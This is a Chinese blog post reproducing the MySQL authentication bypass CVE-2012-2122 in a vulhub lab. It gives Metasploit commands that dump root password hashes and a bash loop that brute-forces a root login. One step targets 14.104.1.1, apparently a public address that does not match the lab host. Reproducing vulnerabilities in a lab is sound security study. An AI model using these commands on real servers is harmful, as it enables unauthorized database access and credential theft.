Mysql 身份认证绕过漏洞（CVE-2012-2122）复现_mysql登录漏洞

漏洞详情
漏洞说明#
当连接MariaDB/MySQL时，输入的密码会与期望的正确密码比较，由于不正确的处理，会导致即便是memcmp()返回一个非零值，也会使MySQL认为两个密码是相同的。也就是说只要知道用户名，不断尝试就能够直接登入SQL数据库漏洞编号#
CVE-2012-2122
影响范围#所有的Mariadb和mysql版本:5.1.61、5.0.11、5.3.5、5.5.22

实验环境
攻击机：kali 2020.2
靶机：CentOS Linux 7
项目地址：
https://github.com/vulhub/vulhub

基础环境搭建
查看我以前的博客自行搭建

实验环境搭建
项目地址

https://github.com/vulhub/vulhub
1

下载后上传至任意目录，进入目录

vulhub-master/mysql/CVE-2012-2122
1

启动docker编译

docker-compose up -d
1

至此实验环境搭建成功，查看对应的端口

复现步骤
我们用nmap扫描一下mysql的版本为5.5.23

这里我们采用msfconsole中的模块进行漏洞验证

service postgresql start  启动msf数据库
msfconsole  进入msf
use auxiliary/scanner/mysql/mysql_authbypass_hashdump  选择该模块
set rhosts 14.104.1.1  设置目标
set threads 10  设置线程
run
1
2
3
4
5
6

然后解hash就行，解出来登陆

发现密码是“133456”

mysql -u root -P 3306 -h 192.168.247.129 -p
1

漏洞复现方法二
采用shell脚本：（直接返回mysql的shell）

for i in `seq 1 1000`; do mysql -u root --password=bad -h 192.168.247.129 2>/dev/null; done
1

复现成功！